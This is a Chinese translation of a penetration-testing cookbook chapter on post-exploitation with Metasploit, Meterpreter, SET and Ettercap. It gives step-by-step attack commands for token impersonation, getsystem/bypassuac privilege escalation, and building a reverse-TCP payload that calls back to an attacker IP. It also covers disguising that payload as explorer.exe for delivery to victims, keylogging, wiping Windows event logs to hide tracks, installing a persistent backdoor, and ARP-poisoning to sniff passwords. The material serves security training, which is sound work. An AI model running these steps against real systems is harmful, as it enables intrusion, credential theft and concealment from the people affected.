第七章 權限提升
作者:Willie L. Pritchett, David De Smet
譯者:飛龍
簡介
我們已經獲得了想要攻擊的計算機的權限。于是將權限盡可能提升就非常重要。通常,我們能訪問較低權限的用戶賬戶(計算機用戶),但是,我們的目標賬戶可能是管理員賬戶。這一章中我們會探索幾種提升權限的方式。
7.1 使用模擬令牌
這個秘籍中,我們會通過使用模擬令牌,模擬網絡上的另一個用戶。令牌包含用于登錄會話和識別用戶、用戶組合用戶權限的安全信息。當用戶登入 Windows 系統是,它們會得到一個訪問令牌,作為授權會話的一部分。令牌模擬允許我們通過模擬指定用戶來提升自己的權限。例如,系統賬戶可能需要以管理員身份運行來處理特定的任務。并且他通常會在結束后讓渡提升的權限。我們會使用這個弱點來提升我們的訪問權限。
準備
為了執行這個秘籍,我們需要:
內部網絡或互聯網的連接。
受害者的目標主機
操作步驟
我們從 Meterpreter 開始探索模擬令牌。你需要使用 Metasploit 來攻擊主機,以便獲得 Meterpreter shell。你可以使用第六章的秘籍之一,來通過 Metasploit 獲得訪問權限。
下面是具體步驟:
-
我們可以在 Meterpreter 使用
incognito來開始模擬過程:use incognito -
展示
incognito的幫助文檔,通過輸入help命令:help -
你會注意到我們有幾個可用的選項:
-
下面我們打算獲得可用用戶的列表,這些用戶當前登入了系統,或者最近訪問過系統。我們可以通過以
-u執行list_tokens命令來完成它。list_tokens –u -
下面,我們執行模擬攻擊。語法是
impersonate_token [name of the account to impersonate]。impersonate_token \\willie-pc\willie 最后,我們選擇一個 shell 命令來運行。如果我們成功了,我們就以另一個用戶的身份在使用當前系統。
工作原理
這個秘籍中,我們以具有漏洞的主機開始,之后使用 Meterpreter 在這臺主機上模擬另一個用戶的令牌。模擬攻擊的目的是盡可能選擇最高等級的用戶,最好是同樣跨域連接的某個人,并且使用它們的賬戶來深入挖掘該網絡。
7.2 本地提權攻擊
這個秘籍中,我們會在一臺具有漏洞的主機上進行提權。本地提權允許我們訪問系統或域的用戶賬戶,從而利用我們所連接的當前系統。
準備
為了執行這個秘籍,我們需要:
內部網絡或互聯網的連接。
使用 Metasploit 框架的具有漏洞的主機。
操作步驟
讓我們在 Meterpreter shell 中開始執行本地提權攻擊。你需要使用 Metasploit 攻擊某個主機來獲得 Meterpreter shell。你可以使用第六章的秘籍之一,來通過 Metasploit 獲得主機的訪問。
-
一旦你通過 Metasploit 和 Meterpreter shell 獲得了受害者的訪問權限,等待你的 Meterpreter 顯示提示符。
-
下面,使用
-h選項查看getsystem的幫助文件:getsystem –h -
最后我們不帶任何選項來運行
getsystem:getsystem如果你嘗試獲得 Windows 7 主機的訪問,你必須在執行
getsystem命令之前執行bypassuac。bypassuac允許你繞過[微軟的用戶賬戶控制](http://windows.microsoft.com/en-us/windows7/products/ features/user-account-control)。這個命令這樣運行:run post/windows/escalate/bypassuac。 下面,我們執行最后的命令來獲取訪問。
這就結束了。我們已經成功進行了提權攻擊。
工作原理
這個秘籍中,我們使用了 Meterpreter 對受害者的主機進行本地提權攻擊。我們從 Meterpreter 中開始這個秘籍。之后我們執行了getsystem命令,它允許 Meterpreter 嘗試在系統中提升我們的證書。如果成功了,我們就有了受害者主機上的系統級訪問權限。
7.3 掌握社會工程工具包(SET)
這個秘籍中,我們會探索社會工程工具包(SET)。SET 是個包含一些工具的框架,讓你能夠通過騙術來攻擊受害者。SET 由 David Kennedy 設計。這個工具很快就成為了滲透測試者工具庫中的標準。
操作步驟
掌握 SET 的步驟如下所示。
-
打開終端窗口,通過按下終端圖標,并訪問 SET 所在的目錄:
se-toolkit 完成之后,你會看到 SET 菜單。SET 菜單有如下選項:
+ Social-Engineering Attacks (社會工程攻擊)
+ Fast-Track Penetration Testing (快速跟蹤滲透測試)
+ Third Party Modules (第三方模塊)
+ Update the Metasploit Framework (更新 Metasploit 框架)
+ Update the Social-Engineer Toolkit (更新社會工程工具包)
+ Update SET configuration (更新 SET 配置)
+ Help, Credits, and About (幫助,作者和關于)
+ Exit the Social-Engineer Toolkit(退出社會工程工具包)
> 在進行攻擊之前,最好先將升級 SET ,因為作者經常會升級它。
這些選項如下圖所示:
-
出于我們的目的,我們選擇第一個選項來開始社會工程攻擊:
1 -
我們現在會看到社會工程攻擊的列表,它們展示在下面的截圖中。出于我們的目的,我們使用
Create a Payload and Listener(創建載荷和監聽器,選項 4)。4 -
下面,我們被詢問輸入載荷的 IP 來反轉鏈接。這里,我們輸入我們的 IP 地址:
192.168.10.109 -
你會看到載荷的列表和描述,它們為
Payload and Listener選項生成。選擇Windows Reverse_TCP Meterpreter。這會讓我們連接到目標上,并對其執行 Meterpreter 載荷。2 -
最后,我們被詢問作為監聽器端口的端口號。已經為你選擇了 443,所以我們就選擇它了。
443 -
一旦載荷準備完畢,你會被詢問來啟動監聽器,輸入
Yes: -
你會注意到 Metasploit 打開了一個處理器。
工作原理
這個秘籍中,我們探索了 SET 的用法。SET 擁有菜單風格的接口,使它易于生成用于欺騙受害者的工具。我們以初始化 SET 開始,之后,SET 為我們提供了幾種攻擊方式。一旦我們選擇了它,SET 會跟 Metasploit 交互,同時詢問用戶一系列問題。在這個秘籍的最后,我們創建了可執行文件,它會提供給我們目標主機的 Meterpreter 活動會話。
更多
作為替代,你可以從桌面上啟動 SET,訪問Applications | Kali Linux | Exploitation Tools | Social Engineering Tools | Social Engineering Toolkit | Set。
將你的載荷傳給受害者
下面的步驟會將你的載荷傳給受害者。
-
在 SET 目錄下,你胡注意到有個 EXE 文件叫做
msf.exe。推薦你將文件名稱修改為不會引起懷疑的名稱。這里,我們將它改為explorer.exe。最開始,我們打開終端窗口并訪問 SET 所在的目錄。cd /usr/share/set -
之后我們獲得目錄中所有項目的列表。
ls -
之后我們將這個文件重命名為
explorer.exe:mv msf.exe explorer.exe -
現在我們壓縮
explorer.exe載荷。這里,ZIP 歸檔叫做healthyfiles。zip healthyfiles explorer.exe 既然你已經擁有了 ZIP 歸檔,你可以把文件以多種方式分發給受害者。你可以通過電子郵件來傳遞,也可以放進 U 盤并手動在受害者機器中打開,以及其它。探索這些機制會給你想要的結果來達成你的目標。
7.4 收集受害者數據
這個秘籍中,我們會探索如何使用 Metasploit 來收集受害者的數據。有幾種方式來完成這個任務,但是我們會探索在目標機器上記錄用戶擊鍵順序的方式。收集受害者數據可以讓我們獲得潛在的額外信息,我們可以將其用于進一步的攻擊中。對于我們的例子,我們會收集目標主機上用戶輸入的擊鍵順序。
準備
為了執行這個秘籍,我們需要:
內部網絡或互聯網的連接。
使用 Metasploit 框架的具有漏洞的主機。
操作步驟
讓我們開始通過 Meterpreter shell 來收集受害者數據。你需要使用 Metasploit 攻擊某個主機來獲得 Meterpreter shell。你可以使用第六章的秘籍之一,來通過 Metasploit 獲得目標主機的訪問。
-
一旦你通過 Metasploit 和 Meterpreter shell 獲得了受害者的訪問權限,等待你的 Meterpreter 顯示提示符。
-
下面,我們執行下面的命令來開啟鍵盤記錄器:
keyscan_start -
最后,我們輸入
keyscan_dump命令,將用戶的擊鍵順序輸出到屏幕上。keyscan_dump
工作原理
這個秘籍中,我們使用 Meterpreter 收集了受害者的數據。
更多
有一種不同的方式,你可以使用它們來收集受害者機器上的數據。這個秘籍中,我們使用了 Metasploit 和 Metasploit keyscan 來記錄擊鍵順序,但是我們也可以使用 Wireshark 或 airodump-ng 來更簡單地收集數據。
這里的關鍵是探索其它工具,便于你找到最喜歡的工具來完成你的目標。
7.5 清理蹤跡
這個秘籍中,我們會使用 Metasploit 來清除我們的蹤跡。在黑進主機之后執行清理是個非常重要的步驟,因為你不想在經歷所有麻煩來獲得訪問權限之后還被人查水表。幸運的是,Metasploit 擁有一種方式來非常簡單地清除我們的蹤跡。
準備
為了執行這個秘籍,我們需要:
內部網絡或互聯網的連接。
使用 Metasploit 框架的具有漏洞的主機。
操作步驟
需要執行步驟如下所示:
-
讓我們開始使用 Meterpreter shell 來清理我們的蹤跡。你需要使用 Metasploit 攻擊某個主機來獲得 Meterpreter shell。你可以使用第六章的秘籍之一,來通過 Metasploit 獲得目標主機的訪問。一旦你通過 Metasploit 和 Meterpreter shell 獲得了受害者的訪問權限,等待你的 Meterpreter 顯示提示符。
-
下面,我們需要運行 IRB,以便進行日志移除操作。我們打開幫助文件:
irb -
下面,我們告訴 IRB 要移除哪個文件。下面是一個可用的選擇:
log = client.sys.eventlog.open('system') log = client.sys.eventlog.open('security') log = client.sys.eventlog.open('application') log = client.sys.eventlog.open('directory service') log = client.sys.eventlog.open('dns server') log = client.sys.eventlog.open('file replication service') -
出于我們的目的,我們把它們都清理掉。你需要將這些一次鍵入:
log = client.sys.eventlog.open('system') log = client.sys.eventlog.open('security') log = client.sys.eventlog.open('application') log = client.sys.eventlog.open('directory service') log = client.sys.eventlog.open('dns server') log = client.sys.eventlog.open('file replication service') -
現在我們執行命令來清理日志文件:
Log.clear 這就結束了。我們只用了這么少的命令就能清理我們的蹤跡。
工作原理
這個秘籍中,我們使用 Meterpreter 來清理我們在目標主機上的蹤跡。我們從 Meterpreter 中開始這個秘籍,并啟動了 IRB(一個 Ruby 解釋器 shell)。下面,我們指定了想要清理的文件,并且最后鍵入了Log.clear命令來清理日志。要記住,一旦我們黑進了某個主機,你需要在最后執行這一步。你不能在清理蹤跡之后再執行更多的操作,這樣只會更加更多的日志條目。
7.6 創建永久后門
這個秘籍中,我們會使用 Metasploit persistence 來創建永久后門。一旦你成功獲得了目標機器的訪問權限,你需要探索重新獲得機器訪問權的方式,而不需要再次黑進它。如果目標機器的用戶做了一些事情來終端連接,比如重啟機器,后門的作用就是允許重新建立到你機器的連接。這就是創建后門非常方便的原因,它可以讓你控制目標機器的訪問。
準備
為了執行這個秘籍,我們需要:
內部網絡或互聯網的連接。
使用 Metasploit 框架的具有漏洞的主機。
操作步驟
讓我們開始植入我們的永久后門。你需要使用 Metasploit 攻擊某個主機來獲得 Meterpreter shell。你可以使用第六章的秘籍之一,來通過 Metasploit 獲得目標主機的訪問。
-
一旦你通過 Metasploit 和 Meterpreter shell 獲得了受害者的訪問權限,等待你的 Meterpreter 顯示提示符。
-
下面,我們需要運行 persistence,以便創建我們的后門。我們打開幫助文件:
run persistence –h -
永久后門有幾個選項,包括:
-A:這個選項會自動啟動一個匹配的多重處理器來鏈接到代理端。-S:這個選項讓后門自動化啟動為系統服務。-U:這個選項讓后門在用戶啟動系統時自動啟動。-i:這個選項設置兩次嘗試回復攻擊者機器之間的秒數。-p:這個選項設置攻擊者機器上 Metasploit 的監聽端口。-P:這個選項設置所用的載荷。默認使用Reverse_tcp,并且它通常是你想使用的東西。-r:這個選項設置攻擊者機器的 IP 地址。
-
現在,我們執行命令來建立后門:
run persistence –U –A –i 10 – 8090 –r 192.168.10.109 -
后門現在已經建立了。如果成功的話,你會注意到你有了第二個 Meterpreter 會話。
工作原理
這個秘籍中,我們使用 Meterpreter 來建立永久后門。我們在黑進目標主機并獲得 Meterpreter shell 之后開始了這個秘籍。之后我們通過瀏覽幫助文檔那個,探索了一些可用的永久化方式。最后,我們通過運行安裝命令并設置它的選項來完成后門的安裝。
7.7 中間人(MITM)攻擊
這個秘籍中,我們會對目標進行中間人(MITM)攻擊。MITM攻擊允許我們竊聽目標和別人的通信。在我們的例子中,當某個 Windows 主機在http://www.yahoo.com收發郵件時,我們使用 Ettercap 來竊聽它的通信。
準備
為了執行這個秘籍,我們需要:
無線網絡連接
連接到無線網絡的機器
操作步驟
讓我們啟動 Ettercap 來開始中間人攻擊。
-
打開終端窗口并啟動 Ettercap。使用
-G選項加載 GUI:ettercap –G -
我們以打開
Unified sniffing(統一嗅探)開始。你可以按下Shift + U或者訪問菜單中的Sniff | Unified sniffing。 -
選擇網絡接口。在發起 MITM 攻擊的情況中,我們應該選項我們的無線接口。
-
下面,我們打開
Scan for hosts(掃描主機)。可以通過按下Ctrl + S或訪問菜單欄的Hosts | Scan for hosts來完成。 -
下面,我們得到了
Host List(主機列表)。你可以按下H或者訪問菜單欄的Hosts | Host List。 -
我們下面需要選擇或設置我們的目標。在我們的例子中,我們選擇
192.168.10.111作為我們的Target 1,通過選中它的 IP 地址并按下Add To Target 1(添加到目標 1)按鈕。 -
現在我們能夠讓 Ettercap 開始嗅探了。你可以按下
Ctrl + W或訪問菜單欄的Start | Start sniffing。 -
最后,我們開始進行 ARP 毒化。訪問菜單欄的
Mitm | Arp poisoning。 -
在出現的窗口中,選中
Sniff remote connections(嗅探遠程連接)的選項。 -
取決于網絡環境,我們會看到信息。
-
一旦我們找到了想要找的信息(用戶名和密碼)。我們可以關閉 Ettercap。你可以按下
Ctrl + E或訪問菜單欄的Start | Stop sniffing來完成它。 -
現在我們關閉 ARP 毒化,使網絡恢復正常。
工作原理
這個秘籍包括 MITM 攻擊,它通過 ARP 包毒化來竊聽由用戶傳輸的無線通信。
你可以通過瀏覽http://en.wikipedia.org/wiki/Man-in-the-middle_attack#Example_of_an_attack來了解更多關于 MITM 的信息。
